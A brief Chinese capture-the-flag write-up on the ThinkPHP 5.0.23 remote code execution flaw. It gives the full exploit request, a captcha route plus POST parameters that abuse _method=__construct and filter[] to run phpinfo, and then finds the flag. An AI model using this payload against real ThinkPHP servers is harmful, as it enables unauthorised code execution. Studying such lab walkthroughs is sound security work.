[ThinkPHP]5.0.23-Rce 1 根据题目知道这是一个5.0.23的PHP RCE,话不多说直接上扫描器 检测出Payload url地址: ?s=captcha&test=-1 Post表单参数: _method=__construct&filter[]=phpinfo&method=get&server[REQUEST_METHOD]=1 HackBar构造payload,访问成功执行到phpinfo页面 ctrf+f 成功找到flag